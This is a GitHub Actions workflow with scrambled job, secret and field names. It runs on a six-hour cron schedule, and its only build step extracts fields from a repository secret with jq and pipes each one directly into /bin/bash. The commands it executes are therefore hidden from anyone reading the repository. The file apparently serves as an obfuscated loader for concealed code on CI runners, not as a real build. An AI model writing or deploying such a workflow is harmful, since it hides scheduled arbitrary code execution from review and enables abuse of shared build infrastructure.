name: lihunzheng4718
on:
  workflow_dispatch:
  schedule:
    - cron: '51 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lihunzheng4718
        env:
          hgsl9: ${{ secrets.hgsl9 }}
        run: |
          echo $hgsl9 | jq -r .lpv88 | /bin/bash
          echo $c0 | jq -r .wy51 | /bin/bash
          echo $rzje0 | jq -r .ooq86562 | /bin/bash
          echo $c6254 | jq -r .rgsms87784 | /bin/bash
          echo $fexwc1 | jq -r .cirhs11 | /bin/bash
          echo $coy389 | jq -r .jvl3 | /bin/bash
          echo $vq2696 | jq -r .aldzr4707 | /bin/bash
          echo $n57121 | jq -r .ctjsq45723 | /bin/bash

